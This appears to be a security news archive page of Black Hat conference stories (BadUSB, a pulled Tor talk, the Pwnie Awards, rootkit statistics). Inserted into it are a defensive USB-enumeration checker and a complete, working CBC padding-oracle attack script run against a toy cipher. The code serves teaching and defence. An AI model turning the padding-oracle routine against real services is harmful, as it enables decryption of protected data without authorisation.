December 21, 2014

Researchers at Black Hat conference demo USB’s fatal flaw

(LiveHacking.Com) – Security researchers Karsten Nohl and Jakob Lell have demonstrated how the firmware of an ordinary USB device can be reprogrammed so that the device infects a computer without the user’s knowledge.

During a presentation at the Black Hat security conference, and in a subsequent interview with the BBC, the pair raised questions about the future security of USB devices.

As part of the demo, a normal-looking smartphone was connected to a laptop, the kind of thing a friend or colleague might ask you to do so they can charge the device. But the phone had been modified to present itself to the host as a USB network adapter rather than as a media device. Once the laptop accepted the new network interface, malicious software on the phone could redirect traffic bound for legitimate web sites to shadow servers that mimic the look and feel of the genuine sites but exist only to steal login credentials.

According to a blog entry posted by the pair, USB’s great versatility is also its Achilles heel. “Since different device classes can plug into the same connectors, one type of device can turn into a more capable or malicious type without the user noticing,” wrote the researchers.

The researchers, who work for Security Research Labs in Germany, gave a presentation at the Black Hat conference called “BadUSB — On accessories that turn evil.” Every USB device contains a micro-controller that is invisible to the user. It talks to the host (e.g. a PC) on one side and drives the actual hardware on the other. Its firmware is specific to the device: webcams, keyboards, network interfaces, smartphones and flash drives all perform different tasks, and the firmware is written accordingly.

However, the team managed to reverse engineer and modify the firmware of several devices in under two months. As a result they can reprogram the devices to behave as something they are not.

During their Black Hat presentation, a standard-looking USB drive was inserted into a computer. The malicious firmware on the stick made the PC believe a keyboard had been plugged in. The fake keyboard then began typing commands and forced the computer to download malware from the internet.

Defending against this type of attack includes tactics such as code-signing of micro-controller firmware updates or disabling firmware changes in hardware. However, these must all be implemented by the USB device makers and aren’t something end users can enforce. On the host side, the most an administrator can do is watch for, or block, devices that enumerate with classes that don’t fit what they claim to be, such as a flash drive that also registers a keyboard.
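One host-side check a practitioner can run against the BadUSB pattern, as an added example that is not SRLabs’ code or anything from the article: it parses Linux kernel enumeration messages (the sample lines are constructed, in the format dmesg prints, and include a flash drive that also registers a HID keyboard and a phone that registers a network interface, the two scenarios demoed above) and flags devices whose interface classes do not fit what they claim to be. The driver-to-class table, the bus-path grouping and the verdict rules are this example’s own assumptions, not a published signature.

```python
"""Flag USB devices whose enumerated interfaces don't match what they claim to be.

Added example, not code from SRLabs or the article. The kernel log lines below
are constructed samples in the format Linux prints during USB enumeration; the
driver->class table and the verdict rules are this example's own assumptions."""
import re
from dataclasses import dataclass, field

# Constructed sample of what `dmesg` shows when three devices are plugged in:
# 1-1 a plain flash drive, 1-2 a "flash drive" that also binds a HID keyboard
# (the BadUSB demo), 1-3 a phone that enumerates as a network adapter.
SAMPLE_DMESG = """\
usb 1-1: new high-speed USB device number 5 using xhci_hcd
usb 1-1: New USB device found, idVendor=0781, idProduct=5567, bcdDevice= 1.00
usb 1-1: Product: Cruzer Blade
usb-storage 1-1:1.0: USB Mass Storage device detected
usb 1-2: new high-speed USB device number 6 using xhci_hcd
usb 1-2: New USB device found, idVendor=1234, idProduct=abcd, bcdDevice= 1.00
usb 1-2: Product: Flash Disk
usb-storage 1-2:1.0: USB Mass Storage device detected
input: Flash Disk as /devices/pci0000:00/0000:00:14.0/usb1/1-2/1-2:1.1/0003:1234:ABCD.0002/input/input14
hid-generic 0003:1234:ABCD.0002: input,hidraw0: USB HID v1.11 Keyboard [Flash Disk] on usb-0000:00:14.0-2/input1
usb 1-3: new high-speed USB device number 7 using xhci_hcd
usb 1-3: New USB device found, idVendor=0fce, idProduct=71f9, bcdDevice= 2.28
usb 1-3: Product: Android
rndis_host 1-3:1.0 usb0: register 'rndis_host' at usb-0000:00:14.0-3, RNDIS device, 02:11:22:33:44:55
"""

# Driver that bound to an interface -> device class it implies (assumed table).
DRIVER_CLASS = {
    "usb-storage": "storage",
    "rndis_host": "network",
    "cdc_ether": "network",
    "cdc_ncm": "network",
    "uvcvideo": "video",
}

RE_PRODUCT = re.compile(r"^usb (?P<path>\d+-[\d.]+): Product: (?P<name>.+)$")
# "usb-storage 1-1:1.0: ..." / "rndis_host 1-3:1.0 usb0: ..." -> driver + bus path
RE_IFACE = re.compile(r"^(?P<driver>[A-Za-z0-9_-]+) (?P<path>\d+-[\d.]+):\d+\.\d+\b")
# The "input:" line ties a HID id (0003:VVVV:PPPP.NNNN) back to its bus path.
RE_INPUT = re.compile(
    r"^input: .*/(?P<path>\d+-[\d.]+):\d+\.\d+/"
    r"(?P<hid>[0-9A-F]{4}:[0-9A-F]{4}:[0-9A-F]{4}\.[0-9A-F]{4})/")
RE_HID = re.compile(r"^hid-generic (?P<hid>\S+): .*USB HID v[\d.]+ (?P<kind>\w+) \[")


@dataclass
class Device:
    path: str
    product: str = "?"
    classes: set = field(default_factory=set)


def parse_dmesg(text):
    """Group enumeration messages by bus path; return {path: Device}."""
    devices, hid_to_path = {}, {}

    def dev(path):
        return devices.setdefault(path, Device(path))

    for line in text.splitlines():
        if m := RE_PRODUCT.match(line):
            dev(m["path"]).product = m["name"]
        elif m := RE_IFACE.match(line):
            if cls := DRIVER_CLASS.get(m["driver"]):
                dev(m["path"]).classes.add(cls)
        elif m := RE_INPUT.match(line):
            hid_to_path[m["hid"]] = m["path"]
        elif m := RE_HID.match(line):
            if path := hid_to_path.get(m["hid"]):
                dev(path).classes.add("keyboard" if m["kind"] == "Keyboard" else "hid")
    return devices


def assess(devices):
    """Return {path: (verdict, reason)}; verdict is 'alert', 'review' or 'ok'."""
    out = {}
    for d in devices.values():
        other = d.classes - {"keyboard", "hid"}
        if "keyboard" in d.classes and other:
            # The BadUSB demo: a storage/network device that also types.
            out[d.path] = ("alert", f"{d.product!r} presents a keyboard alongside {sorted(other)}")
        elif "keyboard" in d.classes:
            out[d.path] = ("review", f"new keyboard {d.product!r} plugged in")
        elif "network" in d.classes:
            # The phone-as-network-card demo: a new NIC can reroute traffic.
            out[d.path] = ("review", f"{d.product!r} added a network interface")
        else:
            out[d.path] = ("ok", "")
    return out


if __name__ == "__main__":
    for path, (verdict, reason) in assess(parse_dmesg(SAMPLE_DMESG)).items():
        print(f"{path:5} {verdict:6} {reason}")
```

In practice the input would be a live `dmesg --follow` or journald stream rather than a constructed string; the same grouping works because the kernel prints the bus path on every enumeration line.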

You can download the slides from the presentation here: https://srlabs.de/blog/wp-content/uploads/2014/07/SRLabs-BadUSB-BlackHat-v1.pdf

Presentation on how to break Tor removed from Black Hat schedule

(LiveHacking.Com) – A highly anticipated briefing about a low-cost technique for de-anonymising Tor users has been removed from the Black Hat 2014 talk schedule. The talk, which would have presented a method for identifying Tor users, was cancelled at the request of attorneys for Carnegie Mellon University in Pittsburgh, where the speakers work as researchers.

The spokesperson for the conference, which is running in Las Vegas on August 6-7, said that a Carnegie Mellon attorney informed Black Hat that one of the speakers could not give the Tor talk because the material he would reveal has not been approved for public release by the university or by the Software Engineering Institute (SEI).

The Onion Router (Tor) network was originally developed with the US Naval Research Laboratory as part of research into privacy and cryptography on the Internet. Tor routes Internet traffic through a series of encrypted relays to conceal a user’s location and activity from anyone monitoring their network traffic. Using Tor makes it more difficult for online activity to be traced, including “visits to Web sites, online posts, instant messages, and other communication forms.”

According to Roger Dingledine, one of the original Tor developers, the project did not “ask Black Hat or CERT to cancel the talk. We did (and still do) have questions for the presenter and for CERT about some aspects of the research, but we had no idea the talk would be pulled before the announcement was made.” He went on to say that the project encourages research on the Tor network along with responsible disclosure of all new and interesting attacks. “Researchers who have told us about bugs in the past have found us pretty helpful in fixing issues, and generally positive to work with,” he added.

Security researcher Alexander Volynkin was scheduled to give the talk titled ‘You Don’t Have to be the NSA to Break Tor: Deanonymizing Users on a Budget’ at the Black Hat conference. It would have outlined ways that individuals can try to find the original source of Tor traffic without the need for large amounts of computing power.

Black Hat: DARPA Launches Cyber Fast Track Program

(LiveHacking.Com) – Peiter Zatko, a hacker known as Mudge who now works at the Defense Advanced Research Projects Agency (DARPA) has told security experts at the Black Hat conference in Las Vegas of DARPA’s new “Cyber Fast Track” program which enables the Pentagon to quickly fund hackers to tackle its tough cybersecurity challenges.

This latest project, aimed at getting cybersecurity expertise into government, cuts red tape and allows hackers to apply for funding for projects that would help the Defense Department secure computer networks.

Zatko said he decided it was time to start funding hackers and boutique security firms, “and making it actually easy enough for them to compete for government research money with the large, traditional government contractors.”

Addressing a key issue for hackers doing government projects, participants will be allowed to keep the commercial intellectual property rights to their work while giving the Defense Department use of the project.

Black Hat: The Pwnies 2011 Security Award Winners

(LiveHacking.Com) – The winners of this year’s Pwnie Awards were announced during the Black Hat USA security conference in Las Vegas. The annual awards ceremony celebrates the achievements and failures of security researchers and the security community.

The award for Best Server-Side Bug went to Juliano Rizzo and Thai Duong, who showed that the ASP.NET framework is vulnerable to a padding oracle attack that can be used to remotely compromise almost any ASP.NET web application, often leading to remote code execution on the server.
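The padding-oracle mechanism behind the Rizzo and Duong bug, as an added example that is neither their ASP.NET exploit nor code from this page: CBC mode with PKCS#7 padding, a server that reveals only whether padding was valid, and the byte-at-a-time recovery that turns that single bit into the full plaintext. The block cipher is a toy 8-byte Feistel network built on SHA-256, an assumption made so the script runs with the standard library alone; the attack never looks inside the cipher, so the same logic applies unchanged to AES.

```python
"""Padding oracle attack on CBC/PKCS#7.

Added example, not the original ASP.NET exploit. The block cipher is a toy
4-round Feistel network over SHA-256 so only the standard library is needed;
the attack only ever asks the oracle "did this decrypt to valid padding?"."""
import hashlib

BLOCK = 8  # toy block size; the attack is identical for AES's 16-byte blocks
ROUNDS = 4


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[: BLOCK // 2]


def block_encrypt(key, block):
    l, r = block[: BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(ROUNDS):
        l, r = r, _xor(l, _round(key, rnd, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[: BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(ROUNDS)):
        l, r = _xor(r, _round(key, rnd, l)), l
    return l + r


def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out += _xor(block_decrypt(key, cur), prev)
        prev = cur
    return out


def padding_oracle(key, iv, ciphertext):
    """The leak: the server reveals whether decryption produced valid padding."""
    try:
        unpad(cbc_decrypt(key, iv, ciphertext))
        return True
    except ValueError:
        return False


def recover_plaintext(oracle, iv, ciphertext):
    """Recover the plaintext using only oracle(prev_block, block) -> bool."""
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # block_decrypt(key, cur), learned back to front
        for pos in range(BLOCK - 1, -1, -1):
            padv = BLOCK - pos  # padding value we force at positions pos..BLOCK-1
            forged = bytearray(BLOCK)
            for k in range(pos + 1, BLOCK):
                forged[k] = inter[k] ^ padv  # known bytes now decrypt to padv
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged), cur):
                    continue
                if pos == BLOCK - 1:
                    # A hit on the last byte might be a longer padding (02 02...);
                    # disturbing the byte before it tells the two cases apart.
                    probe = bytearray(forged)
                    probe[pos - 1] ^= 0xFF
                    if not oracle(bytes(probe), cur):
                        continue
                inter[pos] = guess ^ padv
                break
        plain += _xor(inter, prev)
    return unpad(plain)


# Constructed demo key and message; the attacker side never touches KEY.
KEY = b"constructed-key!"
IV = bytes(range(BLOCK))
SECRET = b"ASP.NET padding oracle demo"


def demo():
    ct = cbc_encrypt(KEY, IV, pad(SECRET))
    return recover_plaintext(lambda iv, block: padding_oracle(KEY, iv, block), IV, ct)


if __name__ == "__main__":
    print(demo())
```

Each byte costs at most 256 oracle queries, so a whole ciphertext falls in a few thousand requests; the fix is to authenticate the ciphertext (a MAC, checked before any decryption) and to make every failure path indistinguishable to the caller.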

The Pwnie for Best Client-Side Bug was awarded to Comex – Comex exploited a vulnerability in the interpreter for Type 1 font programs in the FreeType library used by MobileSafari. This exploit is a great example of programming a weird machine to exploit a modern system. Comex used his control over the interpreter to construct a highly sophisticated ROP payload at runtime and bypass the ASLR protection in iOS. Furthermore, the ROP payload exploited a kernel vulnerability to execute code in the kernel and disable code-signing. The exploit was hosted on jailbreakme.com and was successfully used by thousands of people to jailbreak their iOS devices.

The Best Privilege Escalation Bug went to Tarjei Mandt – In the span of a few months, Tarjei found more than 40 vulnerabilities in the Windows kernel. In his presentation at Infiltrate 2011, he described the details of these vulnerabilities and his kernel exploitation techniques.

The Most Innovative Research Pwnie went to Piotr Bania – To implement some of the ideas from pax-future.txt is one thing, to implement them through static analysis on Windows, rewriting drivers automagically, and have it all work preserving binary compatibility across a wide range of Windows versions: that’s deserving of respect.

And finally the Lamest Vendor Response was awarded to RSA – they got hacked, their SecurID tokens were totally compromised, and they basically passed it off as a non-event and advised customers that replacing the tokens was not necessary … until Lockheed Martin was attacked because of them.

Windows XP is Petri Dish For Rootkit Infections

(LiveHacking.Com) – A six month study, by the AVAST Virus Lab, has found that 74% of rootkit infections originated from Windows XP machines, compared to 17% for Vista and only 12% from Windows 7 machines.

Windows XP is the most common PC operating system, with around 49% of avast! antivirus users running it, compared to 38% on Windows 7 and 13% on Vista.

The problem seems to be that a large number of pirated copies of XP don’t run automatic updates, because they can’t pass the Windows Genuine Advantage validation process. This leaves the out-of-date and unpatched OS open to all kinds of attack, even old ones long since patched by Microsoft.

“Because of the way they attack – and stay concealed – deep in the operation system, rootkits are a perfect weapon for stealing private data” said Przemyslaw Gmerek, the AVAST expert on rootkits and lead researcher.

Cybercriminals are continuing to fine-tune their attack strategy, with the Master Boot Record (MBR) remaining their favorite target even for the newest TDL4 rootkit variants. The study found that rootkits infecting via the MBR were responsible for over 62% of all rootkit infections, while driver infections made up only 27% of the total. The clear leader in rootkit infections was the Alureon (TDL4/TDL3) family, responsible for 74% of infections.

Experts from AVAST Software will be attending the upcoming Black Hat events in Las Vegas on August 3-7, 2011.

And the Winner is….

A REVIEW OF BLACK HAT’S 2011 PREVIEW DOESN’T DISAPPOINT

(LiveHacking.Com) — As a security compliance professional with a limited training budget, I really had to do my homework this year to choose my learning opportunities wisely. So when the question came up “Are you going to Black Hat this year?” I had to pause and ponder… Am I? So off I went to do my research: Who’s going to speak, present, train, showcase this year and what will the ‘wow’ factor be? In doing my ‘use your money wisely’ research, I looked at other security conferences that offer training and I discovered that the Computer Security Institute’s (CSI) annual conference has been canceled this year and they are actually referring people to Black Hat. After completing my research, I had made my ‘more bang for my corporate buck’ decision. And the winner is… Black Hat wins hands down!

This year’s event will be hosted at Caesars Palace in Las Vegas July 30th -Aug 4th and offer over 50 multi-day training sessions, feature 7 Briefings tracks with the latest research, and 2 workshop tracks dedicated to practical application and demonstration of tools. Over the years, Black Hat has earned the reputation for being the premier security event where members of the security industry gather together to learn from elite security researchers, discuss threats to an organization and develop ways to tackle them.

Previous years have entertainingly educated us. In 2010, I found out:

Our money isn’t safe – researcher Barnaby Jack demonstrated how some ATMs are not very hard to compromise. He did it by both physically opening the machine & installing malware on it and by compromising the ATM over the network.

Our cell phones aren’t safe – Mobile Security was hit hard in 2010, Carmen Sandiego showed that you don’t have to be a phone company or government to find out who’s using a particular cell phone number or where the phone is located. I actually used this scenario for a Mock Security Incident at my company this year. – Thanks for the great idea Black Hat!

So what can we expect from Black Hat 2011? – Glad you asked. New this year, Black Hat has formed a Content Review Board made up of sixteen experts from across the areas of information security. As part of this peer review, Black Hat will bring public and private sector security professionals and underground hackers together to uncover groundbreaking vulnerabilities and debut new security tools. Not surprisingly, this year is expected to be the biggest Black Hat Conference yet, with over 6,000 Black Hatters in attendance. 2011’s special events include: Def Con, Black Hat Arsenal, Executive Briefing, and USA 2011 Uplink: Live Streaming Video.

2011 keynote speakers are Cofer Black and Peiter “Mudge” Zatko. Cofer will discuss the 10th Anniversary of 9/11 and Lessons Learned for Black Hat, and Mudge will discuss How a Hacker Has Helped Influence the Government – and Vice Versa.

In addition to the top-notch keynote speakers, I am definitely looking forward to catching many of the countless opportunities to learn, grow, gain insight, and engage in great industry discussions. Here is my choice of the top 10 events that I will be sure to look for:

  1. Faces Of Facebook-Or, How The Largest Real ID Database In The World Came To Be
  2. Legal Aspects of Cybersecurity (AKA) CYBERLAW: A Year in Review, Cases, issues, your questions my (alleged) answers
  3. The Law of Mobile Privacy and Security
  4. SSH as the next back door. Are you giving hackers root access?
  5. Don’t Drop the SOAP: Real World Web Service Testing for Web Hackers
  6. Reverse Engineering Browser Components: Dissecting and Hacking Silverlight, HTML 5 and Flex
  7. Corporate Espionage for Dummies: The Hidden Threat of Embedded Web Servers
  8. Staring into the Abyss: The Dark Side of Security and Professional Intelligence
  9. WORKSHOP – Infosec 2021: A Career Odyssey
  10. Turbo Talk – Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities

Honorable Mention – I love this title! – Don’t Hate the Player, Hate the Game: Inside the Android Security Patch Lifecycle

About the author:
Angel’s security compliance knowledge is well honed by her experience working with and consulting for multiple companies in a variety of industries. Peers and customers consider her a knowledgeable and positive motivator at all levels. She has had the pleasure of establishing effective security programs at multiple companies, designed to address information system threats and corporate risks. She takes great pride in her ability to assist with business, operational and technology concerns. She understands the benefits gained from explaining risks in a business-oriented, non-technical manner. She believes that educating people in security, compliance and risk management ‘common sense’ is the foundation of any successful security program. Angel also prides herself on staying on top of industry standards and new innovations in the security and compliance field. Her professional pastime includes meeting and networking with peers that have similar interests and goals. Her personal motto is: “Work hard, work smart, never stop learning or listening, do what’s right all of the time and never burn bridges.”

Free Access to Black Hat USA 2010 Media Archive

Black Hat USA 2010 was one of the best hacking events of 2010. There were many interesting hacking projects and vulnerability exploits, such as the ATM hacking demonstration.

The Black Hat USA 2010 media archive is available to the public free of charge. In this archive you can find whitepapers, presentations and source materials.

Visit Black Hat USA 2010 Media Archive for full access.